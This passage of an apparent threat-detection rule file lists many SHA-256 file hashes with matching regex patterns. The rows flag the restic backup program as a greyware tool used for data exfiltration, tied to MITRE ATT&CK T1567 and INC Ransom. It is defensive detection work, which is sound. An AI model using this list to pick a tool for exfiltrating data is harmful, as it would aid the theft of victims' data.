Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*67392f0cdf1ea5443b9f625eff4eb55e3630fec77b16e35b01c5b2214023f331*",".{0,1000}67392f0cdf1ea5443b9f625eff4eb55e3630fec77b16e35b01c5b2214023f331.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*680085ce3348940cb67940e3ca7da4ae409ab3169c99592052760ffaf374f9a0*",".{0,1000}680085ce3348940cb67940e3ca7da4ae409ab3169c99592052760ffaf374f9a0.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" 
"*68200563fb40d6ba3b6f744c919867bfc6fd6106b6317e55853d37f797b783b5*",".{0,1000}68200563fb40d6ba3b6f744c919867bfc6fd6106b6317e55853d37f797b783b5.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*683b19a505756b7dc99eca09caf00cd546d474405f08151daef687c890919027*",".{0,1000}683b19a505756b7dc99eca09caf00cd546d474405f08151daef687c890919027.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*6880a6b34d856513873c439fc59d8c51c392fe360d5e69577d4e707d6ef77c02*",".{0,1000}6880a6b34d856513873c439fc59d8c51c392fe360d5e69577d4e707d6ef77c02.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*692e70ade358ad4fe19f0cd5fbaf21c3830d0f23c3d4e491a043f6cbc1b5cf59*",".{0,1000}692e70ade358ad4fe19f0cd5fbaf21c3830d0f23c3d4e491a043f6cbc1b5cf59.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*6936a522d7d0afd5955bc461cdc63d228aaf33d6cbeb7096e26d7ee90010d954*",".{0,1000}6936a522d7d0afd5955bc461cdc63d228aaf33d6cbeb7096e26d7ee90010d954.{0,1000}","greyware_tool_keyword","restic","backup program used by threat 
actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*6a794fbb4e3db6e878ee213bfa6b5307136c074fd2214ca242c6ec4609f59785*",".{0,1000}6a794fbb4e3db6e878ee213bfa6b5307136c074fd2214ca242c6ec4609f59785.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*6b2fc43f794182788aaa8dae50f1f731c33c5126558e621d693c18455aae92cc*",".{0,1000}6b2fc43f794182788aaa8dae50f1f731c33c5126558e621d693c18455aae92cc.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*6b381ea3ed5d0925032ff8d98fe5c443668699983ba7e7b20fddd2b34b5796f0*",".{0,1000}6b381ea3ed5d0925032ff8d98fe5c443668699983ba7e7b20fddd2b34b5796f0.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*6caae495c78cfaf80bef557903f997db566a5cf3ea08c03d6f09e2c30a6d6d0a*",".{0,1000}6caae495c78cfaf80bef557903f997db566a5cf3ea08c03d6f09e2c30a6d6d0a.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data 
Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*6cc2585e1b00bf07cd02b4ee08fb51e88cba155f4a10f753142eb9cc1fcccbc8*",".{0,1000}6cc2585e1b00bf07cd02b4ee08fb51e88cba155f4a10f753142eb9cc1fcccbc8.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*6cecfa1b5cfba371a6a576e213eeb90f5ea82a91f94fb520cf9160a6526e0ac8*",".{0,1000}6cecfa1b5cfba371a6a576e213eeb90f5ea82a91f94fb520cf9160a6526e0ac8.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*6d45c62ffaf587bb28e8c24ce0b29187df9589cce0daa6a2ccc02605a3a4f529*",".{0,1000}6d45c62ffaf587bb28e8c24ce0b29187df9589cce0daa6a2ccc02605a3a4f529.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*6d795a5f052b3a8cb8e7571629da14f00e92035b7174eb20e32fd1440f68aaff*",".{0,1000}6d795a5f052b3a8cb8e7571629da14f00e92035b7174eb20e32fd1440f68aaff.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" 
"*6d94fd795439afe13c95030b1b33a606beae24cab986395e374142021c59a7fa*",".{0,1000}6d94fd795439afe13c95030b1b33a606beae24cab986395e374142021c59a7fa.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*6df9f806f4cb4001e3722196bfe629c48c2dd39078b33e96db139823db1236e1*",".{0,1000}6df9f806f4cb4001e3722196bfe629c48c2dd39078b33e96db139823db1236e1.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*6dfa9158c5e57aab361fe9b554369024c16671a134eb34b1604d0e170e184f57*",".{0,1000}6dfa9158c5e57aab361fe9b554369024c16671a134eb34b1604d0e170e184f57.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*6ee05f1a72395ef7d41538ef5cc84395d5a168d13e3054a329f0d9f593f80f6d*",".{0,1000}6ee05f1a72395ef7d41538ef5cc84395d5a168d13e3054a329f0d9f593f80f6d.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*6f252952b482ffac286cfec43774b6f510ad7f47eb7332ce8bbddc1400a91ec3*",".{0,1000}6f252952b482ffac286cfec43774b6f510ad7f47eb7332ce8bbddc1400a91ec3.{0,1000}","greyware_tool_keyword","restic","backup program used by threat 
actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*6f93ebfce80642e697c1de729ccf6ac3d0d3c7171d4d53e9c69eeaf3417f0d77*",".{0,1000}6f93ebfce80642e697c1de729ccf6ac3d0d3c7171d4d53e9c69eeaf3417f0d77.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*6f9d22dde53839cfc4a035c019f2e55fa6a7e7e1ac308060ec312b70e6272611*",".{0,1000}6f9d22dde53839cfc4a035c019f2e55fa6a7e7e1ac308060ec312b70e6272611.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*6fab3fa836659c85b97e7a8e514bdbb8d4df186600212a7b5c36cafff7942e38*",".{0,1000}6fab3fa836659c85b97e7a8e514bdbb8d4df186600212a7b5c36cafff7942e38.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*6fae4e720a4f9d3d8b9b635ac161596ab4dce24168dabd75e41ccead6915a454*",".{0,1000}6fae4e720a4f9d3d8b9b635ac161596ab4dce24168dabd75e41ccead6915a454.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data 
Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*702e44943daae9c094858ed1a8a50e427264a1967535cad0362ce80fdf5acc92*",".{0,1000}702e44943daae9c094858ed1a8a50e427264a1967535cad0362ce80fdf5acc92.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*713eedbc3a86409bb621d853b9fb157c2abe789a9b696796ca0e887e610e8295*",".{0,1000}713eedbc3a86409bb621d853b9fb157c2abe789a9b696796ca0e887e610e8295.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*718883f3de3684d2fb9c8c905de422a5cefac2bc7dac2b0cad1698be61d54cb9*",".{0,1000}718883f3de3684d2fb9c8c905de422a5cefac2bc7dac2b0cad1698be61d54cb9.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*72c04c3a683943559166a4ef21e7e35670531d6fdf28d3482298b75d5f736718*",".{0,1000}72c04c3a683943559166a4ef21e7e35670531d6fdf28d3482298b75d5f736718.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" 
"*72ce6357beb322ad185e5aec9247665babe206519ec7b0b741b285fdb60375f8*",".{0,1000}72ce6357beb322ad185e5aec9247665babe206519ec7b0b741b285fdb60375f8.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*72fbdbca48fabbc84dfe551bdd3bc2d8d8b96b30ca7a2a71344c4d0878d91d99*",".{0,1000}72fbdbca48fabbc84dfe551bdd3bc2d8d8b96b30ca7a2a71344c4d0878d91d99.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*733c94230677c98424402523a308d03893948c0c89be9920f3ffae73ecbdbc71*",".{0,1000}733c94230677c98424402523a308d03893948c0c89be9920f3ffae73ecbdbc71.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*73cf434ec93e2e20aa3d593dc5eacb221a71d5ae0943ca59bdffedeaf238a9c6*",".{0,1000}73cf434ec93e2e20aa3d593dc5eacb221a71d5ae0943ca59bdffedeaf238a9c6.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*743d40286b6e5d2f630e7f6f2e2609ae4b1d99c455c949677549e63495f6f65a*",".{0,1000}743d40286b6e5d2f630e7f6f2e2609ae4b1d99c455c949677549e63495f6f65a.{0,1000}","greyware_tool_keyword","restic","backup program used by threat 
actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*7492c254c277a271e909f2799447aeab7d753a79d0d231b2246cc2c4a2f92738*",".{0,1000}7492c254c277a271e909f2799447aeab7d753a79d0d231b2246cc2c4a2f92738.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*754754c196b3601f2c29758c94000f208a880d45f9b1cc3164123962c97f4ad7*",".{0,1000}754754c196b3601f2c29758c94000f208a880d45f9b1cc3164123962c97f4ad7.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*759769fb5f4ddb821039eb7aa68632b0f24625e93fd1298ac30474b6343467db*",".{0,1000}759769fb5f4ddb821039eb7aa68632b0f24625e93fd1298ac30474b6343467db.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*75e67a2bd8883d61ee6d62b37ffea24c92ee446d6443a67b17bbfbf449d17e1b*",".{0,1000}75e67a2bd8883d61ee6d62b37ffea24c92ee446d6443a67b17bbfbf449d17e1b.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data 
Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*76a2c3a4f3a39d91c6b42e2990efc64d878a6b5733ff1b14782e4fcdd50fca70*",".{0,1000}76a2c3a4f3a39d91c6b42e2990efc64d878a6b5733ff1b14782e4fcdd50fca70.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*76da4679b37e969c96e2a243e8b4e94a622be8cf28261e722b7f7a70874a3691*",".{0,1000}76da4679b37e969c96e2a243e8b4e94a622be8cf28261e722b7f7a70874a3691.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*772acdb9d5502a67fabe618d3ebf734879f4f5aaf3249aaea40c2d6d0c81d117*",".{0,1000}772acdb9d5502a67fabe618d3ebf734879f4f5aaf3249aaea40c2d6d0c81d117.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*772bec520912784af836fb89dee9a61763aa3c1c6340753fe1dbbc9a2cfb9ea7*",".{0,1000}772bec520912784af836fb89dee9a61763aa3c1c6340753fe1dbbc9a2cfb9ea7.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" 
"*77310426d3e2e159f1ef2c8d498f17dc47cbeae310451377a2857f3ce9cd73c0*",".{0,1000}77310426d3e2e159f1ef2c8d498f17dc47cbeae310451377a2857f3ce9cd73c0.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*774279ce55ca7b8136f36328ce57a884af2880a8f2097160fd44b646aa8e1429*",".{0,1000}774279ce55ca7b8136f36328ce57a884af2880a8f2097160fd44b646aa8e1429.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*7788d7ab1b6b9e57d30766caaacac880553dc869c3c346c194e5bc83d368a1ba*",".{0,1000}7788d7ab1b6b9e57d30766caaacac880553dc869c3c346c194e5bc83d368a1ba.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*78312276c42ff12162e5afaf6de8586d432022c8bc7551366471b8812703be7e*",".{0,1000}78312276c42ff12162e5afaf6de8586d432022c8bc7551366471b8812703be7e.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*783cde05218d88146f9401491cc0431917cb479009f75c3af1e14c4e42bf6a84*",".{0,1000}783cde05218d88146f9401491cc0431917cb479009f75c3af1e14c4e42bf6a84.{0,1000}","greyware_tool_keyword","restic","backup program used by threat 
actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*78abad9b589f303f6d9c129ed5ebfe240fbdbdaa5bb0ffec43dacb2991bd526a*",".{0,1000}78abad9b589f303f6d9c129ed5ebfe240fbdbdaa5bb0ffec43dacb2991bd526a.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*78cdd8994908ebe7923188395734bb3cdc9101477e4163c67e7cc3b8fd3b4bd6*",".{0,1000}78cdd8994908ebe7923188395734bb3cdc9101477e4163c67e7cc3b8fd3b4bd6.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*78fb147d286d223da111ca67f5e0e2532026e3b24a5c513a109c026ff6f025bd*",".{0,1000}78fb147d286d223da111ca67f5e0e2532026e3b24a5c513a109c026ff6f025bd.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*79ade448ca0b6f8b378fa067b60e199a4b5bcbe779397beb1e046f239f60f7e6*",".{0,1000}79ade448ca0b6f8b378fa067b60e199a4b5bcbe779397beb1e046f239f60f7e6.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data 
Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*79f3f7872f14c334104740fc6199ab8eba2a91ddf6f5d2dcbaf6b58ab95362d5*",".{0,1000}79f3f7872f14c334104740fc6199ab8eba2a91ddf6f5d2dcbaf6b58ab95362d5.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*7a0e3f15d12453d6661ff40e068bfee6df470b531e2a5c434a7f62752fc5ca8b*",".{0,1000}7a0e3f15d12453d6661ff40e068bfee6df470b531e2a5c434a7f62752fc5ca8b.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*7a7418913aa6c3e5f5def9d79bc027376cbfccaa6bb334f0852bb1beaecbd358*",".{0,1000}7a7418913aa6c3e5f5def9d79bc027376cbfccaa6bb334f0852bb1beaecbd358.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*7b4c65fae9cf9cb7ce70928fe6580fa9d077c425e1831958098ebc4537ae16c2*",".{0,1000}7b4c65fae9cf9cb7ce70928fe6580fa9d077c425e1831958098ebc4537ae16c2.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" 
"*7b5719a90750b365cd44f2798f2ccfa7e8ee513214cd9a8b9fee13569ed91683*",".{0,1000}7b5719a90750b365cd44f2798f2ccfa7e8ee513214cd9a8b9fee13569ed91683.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*7b603195b50a4b3822f847c97040e2397b0d34eee9fafd60ef6c0fac0c977a29*",".{0,1000}7b603195b50a4b3822f847c97040e2397b0d34eee9fafd60ef6c0fac0c977a29.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*7c3e4ff39cf34bd825ddbcbfeae12fc2bc58adcb0f745686392f11963f750604*",".{0,1000}7c3e4ff39cf34bd825ddbcbfeae12fc2bc58adcb0f745686392f11963f750604.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*7ca6a195613daefad79766c8e784e3e8adeba912f8467b934523041d63e634f5*",".{0,1000}7ca6a195613daefad79766c8e784e3e8adeba912f8467b934523041d63e634f5.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*7cdfe04313b09d98da9ab7526c10ebfad98eeefe1b3b6f7a8e35f689a03785df*",".{0,1000}7cdfe04313b09d98da9ab7526c10ebfad98eeefe1b3b6f7a8e35f689a03785df.{0,1000}","greyware_tool_keyword","restic","backup program used by threat 
actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*7ceaba0911567fe17c4a06f63777411f452783aa8e9eabc3db3858e410e70580*",".{0,1000}7ceaba0911567fe17c4a06f63777411f452783aa8e9eabc3db3858e410e70580.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*7d6d7f8fd0a2ecdd1b81934fd7f0670c17d1f6aa2b67ba1b4cb2a214d1c7b480*",".{0,1000}7d6d7f8fd0a2ecdd1b81934fd7f0670c17d1f6aa2b67ba1b4cb2a214d1c7b480.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*7ddee6c94a33b7dedd603f12f361d2689ca59b41d6b119a806491ac76497ba9a*",".{0,1000}7ddee6c94a33b7dedd603f12f361d2689ca59b41d6b119a806491ac76497ba9a.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*7df4f0da54f3adc731f24f971d41040a2922a9822aa3b0a596b545502a638ef3*",".{0,1000}7df4f0da54f3adc731f24f971d41040a2922a9822aa3b0a596b545502a638ef3.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data 
